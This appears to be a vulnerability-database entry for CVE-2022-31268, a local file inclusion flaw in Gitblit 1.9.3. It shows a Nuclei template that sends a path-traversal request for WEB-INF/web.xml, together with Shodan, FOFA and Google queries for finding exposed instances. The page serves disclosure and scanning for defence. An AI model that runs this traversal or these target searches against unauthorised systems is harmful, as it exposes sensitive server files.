CVE-2022-31268: Gitblit 1.9.3 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Gitblit | POC: 已公开

漏洞描述

Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).

PoC代码[已公开]

id: CVE-2022-31268

info:
  name: Gitblit 1.9.3 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
  remediation: |
    Upgrade Gitblit to a version that is not affected by the vulnerability (CVE-2022-31268).
  reference:
    - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
    - https://vuldb.com/?id.200500
    - https://nvd.nist.gov/vuln/detail/CVE-2022-31268
    - https://github.com/Marcuccio/kevin
    - https://github.com/20142995/sectool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31268
    cwe-id: CWE-22
    epss-score: 0.75375
    epss-percentile: 0.98849
    cpe: cpe:2.3:a:gitblit:gitblit:1.9.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gitblit
    product: gitblit
    shodan-query:
      - http.html:"Gitblit"
      - http.title:"gitblit"
      - http.html:"gitblit"
    fofa-query:
      - title="gitblit"
      - body="gitblit"
    google-query: intitle:"gitblit"
  tags: cve,cve2022,lfi,gitblit

http:
  - method: GET
    path:
      - "{{BaseURL}}/resources//../WEB-INF/web.xml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</web-app>"
          - "java.sun.com"
          - "gitblit.properties"
        condition: and

      - type: word
        part: header
        words:
          - "application/xml"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205cfd122ff44eb4e8892ed997108cf88433bef38482439db1b14a1d4d07a351fb022100ea2ceb70ef7874d13b1b0d670fbb4e1ff7507314240c9db35c211ebbc780ad61:922c64590222798bb761d5b6d8e72950

相关漏洞推荐